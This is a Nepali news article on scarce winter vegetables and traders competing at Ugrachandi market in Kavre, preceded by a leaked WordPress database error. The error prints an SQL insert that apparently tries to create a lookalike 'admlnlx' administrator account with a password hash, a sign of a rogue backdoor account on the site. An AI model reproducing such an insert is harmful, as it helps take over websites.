WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDVKOahjNhhvRyMAOMdlg3kz7gFSVI/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 06:33:53', '', 'admlnlx', 'admlnlx')
काभ्रे,पुष ३-
जिल्लाको नाला क्षेत्रमा तरकारी उत्पादन कम भएपछि व्यापारीको हारालुछ हुन थालेको छ । अन्य महिनाको तुलनामा जाडो महिनामा तरकारीको उत्पादन कम भएकाले तरकारी किन्ने व्यापारीको हारालुछ हुन थालेको हो ।
नालाको उग्रचण्डी बजारमा कालीमाटीको तरकारीे मूल्य भन्दा पनि उच्च रहेको उल्लेख गर्दैै स्थानीय व्यापारी सुन्दर पराजुलीले भन्नुभयो– “उत्पादन बढी भएको समयमा यहाँ व्यापारीले सामान किन्न छाडिदिन्छन् भने कम भएको बेला सधैँ नै हारालुछ हुने गर्छ ।”
यहाँको बजारमा हाल मुला प्रतिकेजी १८ देखि २० रुपैयाँ, काउली २८ देखि ३० रुपैँया र गोलभेँडा ३० देखि ३२ रुयौयाँसम्ममा कृषकबाट खरिद हुने गरेको छ ।
आफ्नो प्रमुख पेसा नै कृषि भएकाले थोरै जग्गामा तरकारीखेती गरेर सात जनाको परिवार धान्न र तीन जनालाई पढाउन सजिलो भएको अर्का कृषक केशब दाहालले बताउनुभयो । “मैले एसएलसी दिएदेखि नै तरकारी खेती गरेको हूँ। अहिले तरकारीखेती गर्न लागेको १५ वर्ष भइसक्यो ।”
आफूले गोलभेँडा र मुलाखेती गरेको र भनेजस्तै मूल्य पाएको उग्रचण्डीकी कृषक कमला दाहालको भनाइ छ । आफूले दुई रोपनी जग्गामा तरकारीखेती गरेर वर्षको झन्डै डेडदेखि दुईलाखसम्मको तरकारी बेच्ने गरेको उहाँले बताउनुभयो ।
अन्य ठाउँमा भन्दा यस बजारमा तरकारीको बिक्री मूल्य राम्रो भएकाले आफूले सधैँ यहीँ तरकारी बेच्न आउने गरेको टुकुचा नालाकी सपना घिमिरेले बताउनुभयो ।
उग्रचण्डीको कृषि बजारमा अन्य ठाउँको भन्दा यहाँका कृषकले लगानीको उचित मूल्य पाएको व्यापारी दीपेन्द्रप्रसाद गुप्ताको भनाइ छ । यहाँ कृषकले सही मूल्य पाउन् र व्यापारीबीच प्रतिस्पर्धा कम होस् भन्नका लागि कृषि बजारको स्थापना गरिएको छ । रासस÷